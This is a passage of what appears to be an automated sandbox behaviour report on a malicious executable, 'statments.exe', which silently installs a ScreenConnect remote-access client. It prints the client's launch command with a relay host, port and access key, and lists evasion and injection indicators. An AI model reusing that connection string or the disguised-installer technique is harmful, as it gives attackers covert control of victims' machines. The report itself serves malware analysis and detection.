                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 1180000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 4BF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 5BB0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 5D00000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: 8590000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1AAF0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: C40000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1A790000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3F66.tmpJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3C77.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\statments.exe TID: 4248Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 5912Thread sleep count: 78 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 4472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: 4d36da.msi.3.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.2788582593.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\statments.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 1.0.statments.exe.9578f8.1.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 1.2.statments.exe.5440000.8.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: C:\Users\user\Desktop\statments.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=76587114-28fc-47f0-86d5-118567cf4a63&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=java&c=&c=it&c=&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\statments.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
